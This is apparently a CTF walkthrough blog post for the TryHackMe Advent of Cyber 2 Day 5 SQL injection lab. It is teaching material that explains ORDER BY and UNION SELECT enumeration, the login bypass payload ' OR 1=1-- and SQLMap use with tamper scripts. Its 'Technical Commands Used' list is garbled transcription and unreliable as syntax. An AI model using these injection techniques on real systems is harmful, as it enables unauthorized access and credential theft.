Premise

In this walkthrough, we covered the steps taken to perform a testing for the presence of SQL injection vulnerability. We used TryHackMe Advent of Cyber 2 / Day 5 / Someone stole Santa’s gift list! as a practical scenario.

TryHackMe Advent of Cyber Challenge Description

After last year’s attack, Santa and the security team have worked hard on reviving Santa’s personal portal. Hence, ‘Santa’s forum 2’ went live.

After the attack, logs have revealed that someone has found Santa’s panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you’ll find the copy of the website and your goal is to replicate the attacker’s actions by dumping the gift list!

Challenge Questions

  • Without using directory brute forcing, what’s Santa’s secret login panel?
  • How many entries are there in the gift database?
  • What did Paul ask for?
  • What is the flag?
  • What is admin’s password?

The Phases of a SQL Injection Attack

A SQL injection attack usually happens in a few phases:

  1. Breaking the Logic: The first thing I do is try to break the database query. I’ll usually do this through a search field or a login form. If I can make the database spit out an error, it’s a good sign that it’s vulnerable to a direct SQL injection. If I don’t see an error, but the page changes in some way, that could mean it’s vulnerable to a blind SQL injection, which is a bit trickier to pull off.
  2. Finding the Number of Columns: Next, I use the ORDER BY statement to figure out how many columns are in the database table. I just keep increasing the number in the ORDER BY clause until I get an error. The number right before the error is the number of columns.
  3. Extracting Information: Once I know the number of columns, I can use UNION SELECT statements to start pulling out sensitive information like database names, tables, columns, and even user password hashes.

Manual vs. Automatic SQL Injection

There are two main ways to go about a SQL injection attack:

  • Manual Method: This way is very time-consuming because you have to try a lot of different SQL payloads. You also need to have a really good understanding of SQL. But, the results you get are usually very accurate and comprehensive. This method is best when you’re targeting a single client.
  • Automatic Method: This is the faster way to do things. You can use tools like SQLMap, Burp Suite, or OWASP ZAP to automate the process. The downside is that the results might not always be accurate, especially if there are firewalls or filters in place. But, it’s great for when you need to scan multiple clients at once. If the automatic method doesn’t work, I always fall back to the manual method.

Practical Demonstration

To show you how this all works in practice, I’ll walk you through the “TryHackMe Advent of Cyber 2 Day 5” challenge.

First, I’ll show you how to bypass a login form using a simple payload: ' OR 1=1-- . This little trick makes the OR 1=1 part of the query always true, and the -- comments out the rest of the query, so you can log in without a password.

Next, I’ll show you how to exploit a search field. I’ll use the ORDER BY trick to find the number of columns, and then I’ll use a UNION SELECT statement to pull out all the usernames and passwords from the users table.

Finally, I’ll show you how to do the same thing using SQLMap. I’ll capture a web request with Burp Suite, save it to a file, and then feed it to SQLMap to automatically find the database version, enumerate the tables, and dump the contents.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

  • order by
  • sudo sql map
  • dash tamper equal space to comment
  • dash dash current dash tv current http
  • dash dash tables
  • dash t sql slides
  • dash t table name is users
  • c the column name for example dash to users the column name is password

Room Answers / Day 5

Without using directory brute forcing, what’s Santa’s secret login panel?

Visit Santa’s secret login panel and bypass the login using SQLi

How many entries are there in the gift database?

What did Paul ask for?

What is the flag?

What is admin’s password?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles